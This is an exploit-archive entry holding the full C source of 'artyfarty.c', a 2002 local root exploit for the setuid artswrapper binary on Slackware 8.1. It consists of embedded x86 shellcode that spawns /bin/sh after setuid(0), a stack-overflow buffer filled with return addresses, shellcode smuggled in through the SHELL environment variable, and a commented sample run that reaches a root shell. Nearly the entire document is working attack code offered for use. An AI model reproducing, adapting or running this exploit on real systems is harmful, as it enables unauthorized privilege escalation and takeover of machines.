artyfarty.c is a local root /opt/kde/bin/artswrapper exploit tested against Slakware 8.1. Artswrapper is setuid on some distributions.
f9e583b433b0720faaf3c2b12a611faba7d90142b62ce3a2fceaf2691c89dc77
/*
* ==================================================
* artyfarty.c local /opt/kde/bin/artswrapper exploit
* By: Knight420
* 11/29/02
*
* Tested against: Slackware 8.1*suid by default
*
* Gr33tz to: sorbo, dvdman, qubit, borgon
*
* (C) COPYRIGHT Blue Ballz , 2002
* all rights reserved
* =================================================
*
* secure@xeon:~> ./artyfarty
* Artswrapper Local exploit by: Knight420
* Using offset 0xbfffff96
* >> running as realtime process now (priority 50)
* sh-2.05a# id
* uid=0(root) gid=100(users) groups=100(users)
*/
#include <stdio.h>
#define STACK_START 0xC0000000
char shellcode[] =
"\x31\xdb\x31\xc0\xb0\x1b\xcd\x80"
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80"
"\xeb\x16\x31\xdb\x31\xc9\xf7\xe1"
"\x5b\xb0\x0b\x88\x53\x07\x52\x53"
"\x89\xe1\xcd\x80\xb0\x01\xcd\x80"
"\xe8\xe5\xff\xff\xff/bin/sh";
int main(int argc, char *argv[]) {
char buff[1033];
char buff2[1033];
int *ptr;
int ret= STACK_START - 106;
char *arg[] = { "artswrapper", "-m", buff, "-a foo", NULL } ;
char *env[] = { buff2, NULL };
for(ptr = (int*)&buff[0]; ptr < (int*)&buff[1033]; ptr++)
*ptr = ret;
buff[sizeof(buff)-1] = 0;
snprintf(buff2,sizeof(buff2),"SHELL=%s",shellcode);
printf("Artswrapper Local exploit by: Knight420\n");
printf("Using offset %p\n",ret);
execve("/opt/kde/bin/artswrapper",arg,env);
}